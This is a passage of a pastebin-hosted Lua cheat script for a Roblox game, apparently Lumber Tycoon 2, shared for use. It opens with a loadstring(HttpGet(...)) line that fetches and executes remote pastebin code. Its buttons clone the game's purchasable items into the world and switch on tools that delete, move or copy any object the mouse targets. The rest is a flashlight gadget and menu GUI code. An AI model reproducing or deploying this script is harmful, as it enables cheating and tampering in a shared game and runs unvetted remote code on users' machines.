  4747. loadstring(game:HttpGet('https://pastebin.com/raw/nMu90Kdq',true))()
  4748.  
  4749. end)
  4750.  
  4751. FunStuffLEAKED.Name = "FunStuffLEAKED"
  4752. FunStuffLEAKED.Parent = LT2GUI2Frame
  4753. FunStuffLEAKED.BackgroundColor3 = Color3.new(0, 0, 0)
  4754. FunStuffLEAKED.BorderColor3 = Color3.new(0, 0, 0)
  4755. FunStuffLEAKED.Position = UDim2.new(0, 3, 0, 118)
  4756. FunStuffLEAKED.Size = UDim2.new(0, 165, 0, 20)
  4757. FunStuffLEAKED.Font = Enum.Font.Fantasy
  4758. FunStuffLEAKED.FontSize = Enum.FontSize.Size18
  4759. FunStuffLEAKED.Text = "Leaked Items"
  4760. FunStuffLEAKED.TextColor3 = Color3.new(255, 0, 0)
  4761. FunStuffLEAKED.TextSize = 15
  4762. FunStuffLEAKED.MouseButton1Down:connect(function()
  4763. makesound("rbxassetid://156785206")
  4764. game.ReplicatedStorage.Purchasables:Clone().Parent = game.Workspace.PlayerModels
  4765. end)
  4766.  
  4767.  
  4768. FunStuffFLASH.Name = "FunStuffFLASH"
  4769. FunStuffFLASH.Parent = LT2GUI2Frame
  4770. FunStuffFLASH.BackgroundColor3 = Color3.new(0, 0, 0)
  4771. FunStuffFLASH.BorderColor3 = Color3.new(0, 0, 0)
  4772. FunStuffFLASH.Position = UDim2.new(0, 3, 0, 141)
  4773. FunStuffFLASH.Size = UDim2.new(0, 165, 0, 20)
  4774. FunStuffFLASH.Font = Enum.Font.Fantasy
  4775. FunStuffFLASH.FontSize = Enum.FontSize.Size18
  4776. FunStuffFLASH.Text = "Flash Light"
  4777. FunStuffFLASH.TextColor3 = Color3.new(255, 0, 0)
  4778. FunStuffFLASH.TextSize = 15
  4779. FunStuffFLASH.MouseButton1Click:Connect(function()
  4780. makesound("rbxassetid://156785206")
  4781. FunStuffFLASH.BackgroundColor3 = Color3.new(0.14902, 0.490196, 0.109804)
  4782. -- Created by supersonicfan111
  4783. local p=game:GetService"Players".LocalPlayer
  4784. local c=p.Character
  4785. local surf='SmoothNoOutlines'
  4786. if not c then error'Cannot find character, please respawn, then rerun the script' end
  4787.  
  4788. -- Flashlight Handle
  4789. local hand=Instance.new"Part"
  4790. hand.BrickColor=BrickColor.DarkGray()
  4791. hand.Parent=c
  4792. hand.Anchored=false
  4793. hand.Locked=true
  4794. hand.CanCollide=false
  4795. hand.FormFactor='Custom'
  4796. hand.Size=Vector3.new(1,1,2)
  4797. hand.TopSurface,hand.BottomSurface=surf,surf
  4798.  
  4799. -- Torch Effect
  4800. local fe=Instance.new"Part"
  4801. fe.BrickColor=BrickColor.new"Black"
  4802. fe.Parent=c
  4803. fe.Anchored=false
  4804. fe.Locked=true
  4805. fe.CanCollide=false
  4806. fe.FormFactor='Custom'
  4807. fe.Size=Vector3.new(.8,.8,.2)
  4808. fe.TopSurface,hand.BottomSurface=surf,surf
  4809.  
  4810. -- Welding stuff
  4811.  
  4812. -- Flash to Right Arm
  4813. local weld1=Instance.new"Weld"
  4814. weld1.Parent=hand
  4815. weld1.Part0=hand
  4816. weld1.Part1=c['Right Arm']
  4817. weld1.C0=CFrame.new(0, 1.5, 0)
  4818.  
  4819. -- Torch Effect to Flash
  4820. local weld2=Instance.new"Weld"
  4821. weld2.Parent=hand
  4822. weld2.Part0=hand
  4823. weld2.Part1=fe
  4824. weld2.C0=CFrame.new(0, 0, 1)
  4825.  
  4826. -- Right Arm Weld
  4827. local ra=Instance.new"Weld"
  4828. ra.Parent=c['Torso']
  4829. ra.Part0=c['Right Arm']
  4830. ra.Part1=c['Torso']
  4831. ra.C0=CFrame.new(-1.5,1,0)*CFrame.Angles(math.rad(180),0,0)
  4832.  
  4833.  
  4834.  
  4835. -- Flashlight Functionality
  4836.  
  4837. local flashlightOn = false
  4838. local Battery=50
  4839.  
  4840. -- Handles turning the flashlight on/off
  4841. p:GetMouse().Button1Down:connect(function()
  4842. flashlightOn=not flashlightOn
  4843. if flashlightOn then
  4844. fe.BrickColor=BrickColor.new"New Yeller"
  4845. light=Instance.new"SurfaceLight"
  4846. light.Parent=fe
  4847. light.Range=1000
  4848. light.Face="Back"
  4849. light.Brightness=10
  4850. fe.Material="Neon"
  4851. else
  4852. fe.BrickColor=BrickColor.new"Black"
  4853. if light then light:destroy() end
  4854. fe.Material="SmoothPlastic"
  4855. end
  4856. end)
  4857.  
  4858. -- Battery Modules
  4859.  
  4860. -- Depleting and Charging
  4861. spawn(function()
  4862. while wait(1) do
  4863. if flashlightOn then
  4864. if Battery > 0 then
  4865. Battery=Battery-1
  4866. end
  4867. else
  4868. if Battery < 100 then
  4869. Battery=Battery+1
  4870. end
  4871. end
  4872. print(Battery)
  4873. end
  4874. end)
  4875.  
  4876. -- Turning off flashlight if the battery is too low
  4877. spawn(function()
  4878. while wait() do
  4879. if Battery <= 0 then
  4880. flashlightOn=false
  4881. if light then light:destroy() end
  4882. fe.BrickColor=BrickColor.new"Black"
  4883. fe.Material="SmoothPlastic"
  4884. end
  4885. end
  4886. end)
  4887.  
  4888. local stepped = game:GetService'RunService'.RenderStepped
  4889. end)
  4890.  
  4891.  
  4892.  
  4893. DeleteTool.Name = "DeleteTool "
  4894. DeleteTool.Parent = LT2GUI2Frame
  4895. DeleteTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4896. DeleteTool.BorderColor3 = Color3.new(0, 0, 0)
  4897. DeleteTool.Position = UDim2.new(0, 3, 0, 187)
  4898. DeleteTool.Size = UDim2.new(0, 165, 0, 20)
  4899. DeleteTool.Font = Enum.Font.Fantasy
  4900. DeleteTool.FontSize = Enum.FontSize.Size18
  4901. DeleteTool.Text = "Delete Tool"
  4902. DeleteTool.TextColor3 = Color3.new(255, 0, 0)
  4903. DeleteTool.TextSize = 15
  4904.  
  4905. MoveTool.Name = "DeleteTool "
  4906. MoveTool.Parent = LT2GUI2Frame
  4907. MoveTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4908. MoveTool.BorderColor3 = Color3.new(0, 0, 0)
  4909. MoveTool.Position = UDim2.new(0, 3, 0, 210)
  4910. MoveTool.Size = UDim2.new(0, 165, 0, 20)
  4911. MoveTool.Font = Enum.Font.Fantasy
  4912. MoveTool.FontSize = Enum.FontSize.Size18
  4913. MoveTool.Text = "Move Tool"
  4914. MoveTool.TextColor3 = Color3.new(255, 0, 0)
  4915. MoveTool.TextSize = 15
  4916.  
  4917. CopyTool.Name = "DeleteTool "
  4918. CopyTool.Parent = LT2GUI2Frame
  4919. CopyTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4920. CopyTool.BorderColor3 = Color3.new(0, 0, 0)
  4921. CopyTool.Position = UDim2.new(0, 3, 0, 233)
  4922. CopyTool.Size = UDim2.new(0, 165, 0, 20)
  4923. CopyTool.Font = Enum.Font.Fantasy
  4924. CopyTool.FontSize = Enum.FontSize.Size18
  4925. CopyTool.Text = "Copy Tool"
  4926. CopyTool.TextColor3 = Color3.new(255, 0, 0)
  4927. CopyTool.TextSize = 15
  4928.  
  4929. DeleteTool.MouseButton1Down:connect(function()
  4930. makesound("rbxassetid://156785206")
  4931. if BTool == "Delete" then
  4932. BTool = "Nothing"
  4933. DeleteTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4934. else
  4935. BTool = "Delete"
  4936. DeleteTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4937. end
  4938. end)
  4939.  
  4940. MoveTool.MouseButton1Down:connect(function()
  4941. makesound("rbxassetid://156785206")
  4942. if BTool == "Move" then
  4943. BTool = "Nothing"
  4944. MoveTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4945. else
  4946. BTool = "Move"
  4947. MoveTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4948. end
  4949. end)
  4950.  
  4951. CopyTool.MouseButton1Down:connect(function()
  4952. makesound("rbxassetid://156785206")
  4953. if BTool == "Copy" then
  4954. BTool = "Nothing"
  4955. CopyTool.BackgroundColor3 = Color3.new(0, 0, 0)
  4956.  
  4957. else
  4958. BTool = "Copy"
  4959. CopyTool.BackgroundColor3 = Color3.new(0, 0.5, 0)
  4960.  
  4961. end
  4962. end)
  4963.  
  4964. Mouse.Button1Up:connect(function()
  4965. MDown = false
  4966. end)
  4967.  
  4968. Mouse.Button1Down:connect(function()
  4969. MDown = true
  4970. if BTool == "Copy" then
  4971. if Mouse.Target ~= nil then
  4972. Clone = Mouse.Target:clone()
  4973. Clone.Parent = game.Workspace
  4974. end
  4975. end
  4976.  
  4977. if BTool == "Delete" then
  4978. if Mouse.Target ~= nil then
  4979. Mouse.Target:remove()
  4980. end
  4981. end
  4982.  
  4983. if BTool == "Move" then
  4984. if Mouse.Target ~= nil then
  4985. MoveObject = Mouse.Target
  4986. end
  4987. end
  4988.  
  4989. wait()
  4990. if Clone ~= nil then
  4991. Clone.CanCollide = false
  4992. repeat
  4993. wait()
  4994. SubX = Clone.Size.X/2
  4995. SubY = Clone.Size.Y/2
  4996. SubZ = Clone.Size.Z/2
  4997. Clone.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  4998. until MDown == false
  4999. Clone.CanCollide = true
  5000. Clone.Position = Clone.Position + Vector3.new(SubX, SubY, SubZ)
  5001. Clone = nil
  5002. end
  5003.  
  5004. if MoveObject ~= nil then
  5005. MoveObject.CanCollide = false
  5006. repeat
  5007. wait()
  5008. SubX = MoveObject.Size.X/2
  5009. SubY = MoveObject.Size.Y/2
  5010. SubZ = MoveObject.Size.Z/2
  5011. MoveObject.Position = Vector3.new(Mouse.Hit.X - SubX, Mouse.Hit.Y - SubY, Mouse.Hit.Z - SubZ)
  5012. until MDown == false
  5013. MoveObject.CanCollide = true
  5014. MoveObject.Position = MoveObject.Position + Vector3.new(SubX, SubY, SubZ)
  5015. MoveObject= nil
  5016. end
  5017. end)
  5018.  
  5019.  
  5020. local Menus = {
  5021. [Player] = PlayerFrame;
  5022. [Teleport] = Waypoints;
  5023. [AIntroImage] = BloodFrameInfo;
  5024. [Woodmenu] = WoodFrame;
  5025. [Copymenu] = CopyFrame;
  5026. [PaintFill] = PaintFills;
  5027. [Artmenu] = ArtFrame;
  5028. [toolamenu] = toolaFrame;
  5029. [Buymenu] = BuyFrame;
  5030. [TpCar] = TpCarFrame;
  5031. [Tptree] = TptreeFrame;
  5032. [Btoolamenu] = LT2GUI2Frame;
  5033. }
  5034. for button,frame in pairs(Menus) do
  5035. button.MouseButton1Click:connect(function()
  5036. if frame.Visible then
  5037. frame.Visible = false
  5038. return
  5039. end
  5040. for k,v in pairs(Menus) do
  5041. v.Visible = v == frame
  5042. end
  5043. end)
  5044. end
  5045.  
  5046.  
  5047. --- Open/Close ---
  5048.  
  5049. function makesound(id)
  5050. local s=Instance.new("Sound",BLOOD)
  5051. s.SoundId=id
  5052. s.Volume=5
  5053. s.PlaybackSpeed=1
  5054. s:Play()
  5055. end
  5056.  
  5057. Open.MouseButton1Click:connect(function()
  5058. makesound("rbxassetid://156785206")
  5059. MainFrame:TweenPosition(UDim2.new(1, -500, 0.7, -210), "Out", "Back",2.5)
  5060. OpenFrame.Visible = true
  5061. MainFrame.Visible = true
  5062. end)
  5063.  
  5064. Minimize.MouseButton1Click:connect(function()
  5065. makesound("rbxassetid://156785206")
  5066. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  5067. wait(2.5)
  5068. MainFrame.Visible = false
  5069. OpenFrame.Visible = true
  5070. end)
  5071.  
  5072. CloseBLOOD.MouseButton1Down:connect(function()
  5073. makesound("rbxassetid://156785206")
  5074. MainFrame:TweenPosition(UDim2.new(0.5, -40, 0, -28), "In", "Back",2.5)
  5075. wait(2.5)
  5076. BLOOD:destroy()
  5077. end)
  5078.  
  5079. --bring up menu
  5080. CurrentItem.MouseButton1Click:Connect(function()
  5081. if Picker.Visible == false then
  5082. Picker.Visible = true
  5083. else
  5084. Picker.Visible = false
  5085. end
  5086. end)
Add Comment
Please, Sign In to add comment